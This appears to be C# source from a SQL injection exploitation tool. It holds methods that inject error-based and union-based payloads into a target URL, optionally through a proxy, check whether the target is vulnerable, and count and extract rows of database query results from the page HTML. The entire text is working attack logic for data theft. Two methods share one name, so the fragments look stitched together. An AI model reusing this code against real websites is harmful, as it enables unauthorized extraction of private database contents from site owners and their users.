public string GetSingleCustomQueryResultRow(int startingFrom) { string result = string.Empty; string generatedPayload = PayloadDetails.Payload; if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0) { foreach (var param in PayloadDetails.Params) { generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this)); } } if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) { generatedPayload = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms), generatedPayload, startingFrom); } string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload); string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null); result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions); //@TODO: strip scripts if (!string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(result)) { XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, result, this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty); } return(result); }
public bool TestIfVulnerable() { string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, GeneralPayloads.ErrorBasedVictimIdentifier); string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null); var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions); return(!string.IsNullOrEmpty(result) && result == GeneralPayloads.ErrorBasedVictimConfirmationResult); }
public int GetTotalNoOfCustomQueryResultRows() { int count = 0; string generatedpayload = string.Empty; if (PayloadDetails == null) { return(0); } if (string.IsNullOrEmpty(PayloadDetails.Payload)) { return(0); } if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single) { return(1); } generatedpayload = PayloadDetails.Payload; if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0) { foreach (var param in PayloadDetails.Params) { generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this)); } } generatedpayload = /*UrlHelpers.HexEncodeValue(*/ string.Format(GeneralPayloads.QueryResultCount, generatedpayload);//); string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedpayload); string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null); string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions); int.TryParse(countString, out count); return(count); }
public int GetTotalNoOfCustomQueryResultRows() { if (_nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0) { if (!TestIfVulnerable()) { throw new SqlInjException("Given script is not injectable using current injection strategy"); } } int count = 0; string generatedpayload = string.Empty; if (PayloadDetails == null) { return(0); } if (string.IsNullOrEmpty(PayloadDetails.Payload)) { return(0); } if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single) { return(1); } generatedpayload = PayloadDetails.Payload; if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0) { foreach (var param in PayloadDetails.Params) { generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this)); } } generatedpayload = string.Format(GeneralPayloads.QueryResultCount, generatedpayload); StringBuilder sbCurExploit = new StringBuilder(); sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, generatedpayload); if (_nrCols > 1) { sbCurExploit.Append(","); } for (int j = 1; j < _nrCols; j++) { sbCurExploit.Append(j.ToString()); if (j < _nrCols - 1) { sbCurExploit.Append(","); } } string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString()); string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null); var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions); int.TryParse(result, out count); return(count); }